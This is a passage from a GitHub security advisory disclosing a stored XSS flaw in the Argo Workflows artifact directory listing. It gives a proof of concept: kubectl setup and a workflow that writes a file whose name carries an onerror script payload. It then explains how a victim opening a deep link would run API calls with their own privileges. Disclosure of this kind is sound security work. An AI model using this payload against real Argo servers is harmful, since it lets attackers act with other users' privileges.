+ "details": "### Summary\nStored XSS in the artifact directory listing allows any workflow author to execute arbitrary JavaScript in another user’s browser under the Argo Server origin, enabling API actions with the victim’s privileges.\n\n### Details\nThe directory listing response in `server/artifacts/artifact_server.go` renders object names directly into HTML via `fmt.Fprintf` without escaping. Object names come from `driver.ListObjects(...)` and are attacker‑controlled when a workflow writes files into an output artifact directory.\n\nhttps://github.com/argoproj/argo-workflows/blob/9872c296d29dcc5e9c78493054961ede9fc30797/server/artifacts/artifact_server.go#L194-L244\n\n### PoC\n1. Deploy Argo Workflows:\n```\nkubectl create ns argo\nkubectl apply --server-side -f manifests/base/crds/full\nkubectl apply --server-side -k manifests/quick-start/postgres\n```\n2. Port‑forward Argo Server:\n```\nkubectl -n argo port-forward deploy/argo-server 2746:2746\n```\n3. Create the PoC workflow:\n```yml\ncat > /tmp/argo-xss.yaml <<'EOF'\napiVersion: argoproj.io/v1alpha1\nkind: Workflow\nmetadata:\n generateName: xss-artifact-test-\nspec:\n entrypoint: main\n templates:\n - name: main\n container:\n image: alpine\n command: [sh, -c]\n args:\n - |\n mkdir -p /tmp/artifacts\n touch '/tmp/artifacts/xss\"><img src=x onerror=\"alert(document.domain)\">.html'\n outputs:\n artifacts:\n - name: dir\n path: /tmp/artifacts\n archive:\n none: {}\nEOF\n```\n```\nkubectl -n argo create -f /tmp/argo-xss.yaml\n```\n4. Wait for completion:\n```\nkubectl -n argo get wf -w\n```\n5. Get the node ID:\n```\nkubectl -n argo get wf <wf-name> \\\n -o jsonpath='{range .status.nodes.*}{.id}{\"\\t\"}{.displayName}{\"\\n\"}{end}'\n```\n6. Open the listing:\n`https://localhost:2746/artifact-files/argo/workflows/<wf-name>/<node-id>/outputs/dir/`\n\n<img width=\"1220\" height=\"349\" alt=\"image\" src=\"https://github.com/user-attachments/assets/9d859826-c7cd-403b-988e-74695552944b\" />\n\n### Impact\n- The attacker creates a workflow that produces a HTML artifact that contains a HTML file that contains a script which uses XHR calls to interact with the Argo Server API.\n- The attacker emails the deep-link to the artifact to their victim. The victim opens the link, the script starts running.\n\nAs the script has access to the Argo Server API (as the victim), so may do the following (if the victim may):\n- Read information about the victim’s workflows.\n- Create or delete workflows.",
![advisory-database[bot]](https://avatars.githubusercontent.com/in/21409?v=4&size=40){kind=avatar}
0 commit comments